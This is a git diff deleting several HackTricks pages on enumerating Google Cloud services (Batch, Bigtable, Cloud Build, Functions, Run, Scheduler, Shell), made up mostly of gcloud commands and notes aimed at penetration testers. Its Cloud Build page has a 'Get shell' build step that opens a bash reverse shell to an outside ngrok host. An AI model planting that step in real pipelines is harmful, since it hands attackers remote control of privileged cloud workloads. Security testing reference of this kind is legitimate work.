-[gcp-api-keys-persistence.md](../gcp-persistence/gcp-api-keys-persistence.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md
deleted file mode 100644
index 4cb12e714..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md
+++ /dev/null
@@ -1,63 +0,0 @@
-# GCP - Batch Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-**Google Cloud Platform (GCP) Batch Service** is designed for running **large-scale batch computing workloads**, automating the management, scheduling, and execution of batch jobs across scalable cloud resources. This service simplifies operations and optimizes costs by allowing users to leverage preemptible VMs and integrates seamlessly with other GCP services for comprehensive batch processing workflows. It's ideal for data processing, financial modeling, and scientific simulations.
-
-### Service Account
-
-Although (currently) it's not possible to select the SA that the batch job will be executed with, **it'll use the compute SA** (Editor permissions usually).
-
-## Enumeration
-
-{% code overflow="wrap" %}
-```bash
-# List jobs
-gcloud batch jobs list
-
-# Get job info
-gcloud batch jobs describe --location
-
-# List tasks
-gcloud batch tasks list --location --job
-
-# Gte info of tasks executions
-gcloud batch tasks describe projects//locations//jobs//taskGroups//tasks/
-```
-{% endcode %}
-
-## Privilege Escalation
-
-{% content-ref url="../gcp-privilege-escalation/gcp-batch-privesc.md" %}
-[gcp-batch-privesc.md](../gcp-privilege-escalation/gcp-batch-privesc.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
deleted file mode 100644
index 7d8c2c5e7..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
+++ /dev/null
@@ -1,58 +0,0 @@
-# GCP - Bigtable Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
-
-A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
-
-```bash
-# Cloud Bigtable
-gcloud bigtable instances list
-gcloud bigtable instances describe
-gcloud bigtable instances get-iam-policy
-
-## Clusters
-gcloud bigtable clusters list
-gcloud bigtable clusters describe
-
-## Backups
-gcloud bigtable backups list --instance
-gcloud bigtable backups describe --instance
-gcloud bigtable backups get-iam-policy --instance
-
-## Hot Tables
-gcloud bigtable hot-tablets list
-
-## App Profiles
-gcloud bigtable app-profiles list --instance
-gcloud bigtable app-profiles describe --instance
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md deleted file mode 100644 index 18aef35d1..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md +++ /dev/null @@ -1,199 +0,0 @@ -# GCP - Cloud Build Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Build is a managed CI/CD platform that **automates software build** and release processes, integrating with **source code repositories** and supporting a wide range of programming languages. It **allows developers to build, test, and deploy code automatically** while providing flexibility to customize build steps and workflows. - -Each Cloud Build Trigger is **related to a Cloud Repository or directly connected with an external repository** (Github, Bitbucket and Gitlab). - -{% hint style="success" %} -I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a [https://source.cloud.google.com/](https://source.cloud.google.com/) URL and Github is not accessed by the client. -{% endhint %} - -### Events - -The Cloud Build can be triggered if: - -* **Push to a branch**: Specify the branch -* **Push a new tag**: Specify the tag -* P**ull request**: Specify the branch that receives the PR -* **Manual Invocation** -* **Pub/Sub message:** Specify the topic -* **Webhook event**: Will expose a HTTPS URL and the request must be authenticated with a secret - -### Execution - -There are 3 options: - -* A yaml/json **specifying the commands** to execute. Usually: `/cloudbuild.yaml` - * Only one that can be specified “inline” in the web console and in the cli - * Most common option - * Relevant for unauthenticated access -* A **Dockerfile** to build -* A **Buildpack** to build - -### SA Permissions - -The **Service Account has the `cloud-platform` scope**, so it can **use all the privileges.** If **no SA is specified** (like when doing submit) the **default SA** `@cloudbuild.gserviceaccount.com` will be **used.** - -By default no permissions are given but it's fairly easy to give it some: - -
-
-### Approvals
-
-It's possible to config a Cloud Build to **require approvals for build executions** (disabled by default).
-
-### PR Approvals
-
-When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`.
-
-
-
-### Connections & Repositories
-
-Connections can be created over:
-
-* **GitHub:** It will show an OAuth prompt asking for permissions to **get a Github token** that will be stored inside the **Secret Manager.**
-* **GitHub Enterprise:** It will ask to install a **GithubApp**. An **authentication token** from your GitHub Enterprise host will be created and stored in this project as a S**ecret Manager** secret.
-* **GitLab / Enterprise:** You need to **provide the API access token and the Read API access toke**n which will stored in the **Secret Manager.**
-
-Once a connection is generated, you can use it to **link repositories that the Github account has access** to.
-
-This option is available through the button:
-
-
-
-{% hint style="success" %}
-Note that repositories connected with this method are **only available in Triggers using 2nd generation.**
-{% endhint %}
-
-### Connect a Repository
-
-This is not the same as a **`connection`**. This allows **different** ways to get **access to a Github or Bitbucket** repository but **doesn't generate a connection object, but it does generate a repository object (of 1st generation).**
-
-This option is available through the button:
-
-
- -### Storage - -Sometimes Cloud Build will **generate a new storage to store the files for the trigger**. This happens for example in the example that GCP offers with: - -```bash -git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \ - cd cloud-console-sample-build && \ - gcloud builds submit --config cloudbuild.yaml --region=global -``` - -A Storage bucket called [security-devbox\_cloudbuild](https://console.cloud.google.com/storage/browser/security-devbox_cloudbuild;tab=objects?forceOnBucketsSortingFiltering=false\&project=security-devbox) is created to store a `.tgz` with the files to be used. - -### Get shell - -```yaml -steps: - - name: bash - script: | - #!/usr/bin/env bash - bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1 -options: - logging: CLOUD_LOGGING_ONLY -``` - -Install gcloud inside cloud build: - -```bash -# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image -curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz -mkdir -p /usr/local/gcloud -tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz -/usr/local/gcloud/google-cloud-sdk/install.sh -``` - -### Enumeration - -You could find **sensitive info in build configs and logs**. - -```bash -# Get configured triggers configurations -gcloud builds triggers list # Check for the words github and bitbucket -gcloud builds triggers describe - -# Get build executions -gcloud builds list -gcloud builds describe # Get even the build yaml if defined in there -gcloud builds log # Get build logs - -# List all connections of each region -regions=("${(@f)$(gcloud compute regions list --format='value(name)')}") -for region in $regions; do - echo "Listing build connections in region: $region" - connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}") - if [[ ${#connections[@]} -eq 0 ]]; then - echo "No connections found in region $region." 
- else - for connection in $connections; do - echo "Describing connection $connection in region $region" - gcloud builds connections describe "$connection" --region="$region" - echo "-----------------------------------------" - done - fi - echo "=========================================" -done - -# List all worker-pools -regions=("${(@f)$(gcloud compute regions list --format='value(name)')}") -for region in $regions; do - echo "Listing build worker-pools in region: $region" - gcloud builds worker-pools list --region="$region" - echo "-----------------------------------------" -done -``` - -### Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudbuild-privesc.md" %} -[gcp-cloudbuild-privesc.md](../gcp-privilege-escalation/gcp-cloudbuild-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md" %} -[gcp-cloud-build-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md" %} -[gcp-cloud-build-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md
deleted file mode 100644
index f12757734..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md
+++ /dev/null
@@ -1,135 +0,0 @@
-# GCP - Cloud Functions Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cloud Functions
-
-[Google Cloud Functions](https://cloud.google.com/functions/) are designed to host your code, which **gets executed in response to events**, without necessitating the management of a host operating system. Additionally, these functions support the storage of environment variables, which the code can utilize.
-
-### Storage
-
-The Cloud Functions **code is stored in GCP Storage**. Therefore, anyone with **read access over buckets** in GCP is going to be able to **read the Cloud Functions code**.\
-The code is stored in a bucket like one of the following:
-
-* `gcf-sources--/-/version-/function-source.zip`
-* `gcf-v2-sources--/function-source.zip`
-
-For example:\
-`gcf-sources-645468741258-us-central1/function-1-003dcbdf-32e1-430f-a5ff-785a6e238c76/version-4/function-source.zip`
-
-{% hint style="warning" %}
-Any user with **read privileges over the bucket** storing the Cloud Function could **read the executed code**.
-{% endhint %}
-
-### Artifact Registry
-
-If the cloud function is configured so the executed Docker container is stored inside and Artifact Registry repo inside the project, anyway with read access over the repo will be able to download the image and check the source code. For more info check:
-
-{% content-ref url="gcp-artifact-registry-enum.md" %}
-[gcp-artifact-registry-enum.md](gcp-artifact-registry-enum.md)
-{% endcontent-ref %}
-
-### SA
-
-If not specified, by default the **App Engine Default Service Account** with **Editor permissions** over the project will be attached to the Cloud Function.
-
-### Triggers, URL & Authentication
-
-When a Cloud Function is created the **trigger** needs to be specified. One common one is **HTTPS**, this will **create an URL where the function** can be triggered via web browsing.\
-Other triggers are pub/sub, Storage, Filestore...
-
-The URL format is **`https://-.cloudfunctions.net/`**
-
-When the HTTPS tigger is used, it's also indicated if the **caller needs to have IAM authorization** to call the Function or if **everyone** can just call it:
-
-
- -### Inside the Cloud Function - -The code is **downloaded inside** the folder **`/workspace`** with the same file names as the ones the files have in the Cloud Function and is executed with the user `www-data`.\ -The disk **isn't mounted as read-only.** - -### Enumeration - -```bash -# List functions -gcloud functions list -gcloud functions describe # Check triggers to see how is this function invoked -gcloud functions get-iam-policy - -# Get logs of previous runs. By default, limits to 10 lines -gcloud functions logs read --limit [NUMBER] - -# Call a function -curl https://-.cloudfunctions.net/ -gcloud functions call --data='{"message": "Hello World!"}' - -# If you know the name of projects you could try to BF cloud functions names - -# Get events that could be used to trigger a cloud function -gcloud functions event-types list - -# Access function with authentication -curl -X POST https://-.cloudfunctions.net/ \ --H "Authorization: bearer $(gcloud auth print-identity-token)" \ --H "Content-Type: application/json" \ --d '{}' -``` - -### Privilege Escalation - -In the following page, you can check how to **abuse cloud function permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md" %} -[gcp-cloudfunctions-privesc.md](../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md" %} -[gcp-cloud-functions-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md" %} -[gcp-cloud-functions-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref 
url="../gcp-persistence/gcp-cloud-functions-persistence.md" %} -[gcp-cloud-functions-persistence.md](../gcp-persistence/gcp-cloud-functions-persistence.md) -{% endcontent-ref %} - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md
deleted file mode 100644
index 82989eafc..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md
+++ /dev/null
@@ -1,137 +0,0 @@
-# GCP - Cloud Run Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cloud Run
-
-Cloud Run is a serverless managed compute platform that lets you **run containers** directly on top of Google's scalable infrastructure.
-
-You can run your container or If you're using Go, Node.js, Python, Java, .NET Core, or Ruby, you can use the [source-based deployment](https://cloud.google.com/run/docs/deploying-source-code) option that **builds the container for you.**
-
-Google has built Cloud Run to **work well together with other services on Google Cloud**, so you can build full-featured applications.
-
-### Services and jobs
-
-On Cloud Run, your code can either run continuously as a _**service**_ or as a _**job**_. Both services and jobs run in the same environment and can use the same integrations with other services on Google Cloud.
-
-* **Cloud Run services.** Used to run code that responds to web requests, or events.
-* **Cloud Run jobs.** Used to run code that performs work (a job) and quits when the work is done.
-
-## Cloud Run Service
-
-Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080 inside the container by default, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response.
-
-### Relevant details
-
-* By **default**, the **access** to the web server is **public**, but it can also be **limited to internal traffic** (VPC...)\
- Moreover, the **authentication** to contact the web server can be **allowing all** or to **require authentication via IAM**.
-* By default, the **encryption** uses a **Google managed key**, but a **CMEK** (Customer Managed Encryption Key) from **KMS** can also be **chosen**.
-* By **default**, the **service account** used is the **Compute Engine default one** which has **Editor** access over the project and it has the **scope `cloud-platform`.** -* It's possible to define **clear-text environment variables** for the execution, and even **mount cloud secrets** or **add cloud secrets to environment variables.** -* It's also possible to **add connections with Cloud SQL** and **mount a file system.** -* The **URLs** of the services deployed are similar to **`https://-.a.run.app`** -* A Run Service can have **more than 1 version or revision**, and **split traffic** among several revisions. - -### Enumeration - -```bash -# List services -gcloud run services list -gcloud run services list --platform=managed -gcloud run services list --platform=gke - -# Get info of a service -gcloud run services describe --region - -# Get info of all the services together -gcloud run services list --format=yaml -gcloud run services list --platform=managed --format=json -gcloud run services list --platform=gke --format=json - -# Get policy -gcloud run services get-iam-policy --region - -# Get revisions -gcloud run revisions list --region -gcloud run revisions describe --region - -# Get domains -gcloud run domain-mappings list -gcloud run domain-mappings describe - -# Attempt to trigger a job unauthenticated -curl - -# Attempt to trigger a job with your current gcloud authorization -curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" -``` - -## Cloud Run Jobs - -Cloud Run jobs are be a better fit for **containers that run to completion and don't serve requests**. Jobs don't have the ability to serve requests or listen on a port. This means that unlike Cloud Run services, jobs should not bundle a web server. Instead, jobs containers should exit when they are done. 
- -### Enumeration - -```bash -gcloud beta run jobs list -gcloud beta run jobs describe --region -gcloud beta run jobs get-iam-policy --region -``` - -## Privilege Escalation - -In the following page, you can check how to **abuse cloud run permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-run-privesc.md" %} -[gcp-run-privesc.md](../gcp-privilege-escalation/gcp-run-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md" %} -[gcp-cloud-run-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md" %} -[gcp-cloud-run-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) -{% endcontent-ref %} - -## Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-run-persistence.md" %} -[gcp-cloud-run-persistence.md](../gcp-persistence/gcp-cloud-run-persistence.md) -{% endcontent-ref %} - -## References - -* [https://cloud.google.com/run/docs/overview/what-is-cloud-run](https://cloud.google.com/run/docs/overview/what-is-cloud-run) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
deleted file mode 100644
index 1614bc5d2..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
+++ /dev/null
@@ -1,73 +0,0 @@
-# GCP - Cloud Scheduler Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**.
-
-Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code.
-
-At the moment of this writing these are the actions this service allows to schedule:
-
-
- -* **HTTP**: Send an HTTP request defining the headers and body of the request. -* **Pub/Sub**: Send a message into an specific topic -* **App Engine HTTP**: Send an HTTP request to an app built in App Engine -* **Workflows**: Call a GCP Workflow. - -## Service Accounts - -A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\ -Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request. - -{% hint style="danger" %} -Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page. -{% endhint %} - -Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`. - -## Enumeration - -```bash -# Get schedulers in a location -gcloud scheduler jobs list --location us-central1 - -# Get information of an specific scheduler -gcloud scheduler jobs describe --location us-central1 -``` - -## Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md" %} -[gcp-cloudscheduler-privesc.md](../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md
deleted file mode 100644
index d03e8b288..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md
+++ /dev/null
@@ -1,54 +0,0 @@
-# GCP - Cloud Shell Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-Google Cloud Shell is an interactive shell environment for Google Cloud Platform (GCP) that provides you with **command-line access to your GCP resources directly from your browser or shell**. It's a managed service provided by Google, and it comes with a **pre-installed set of tools**, making it easier to manage your GCP resources without having to install and configure these tools on your local machine.\
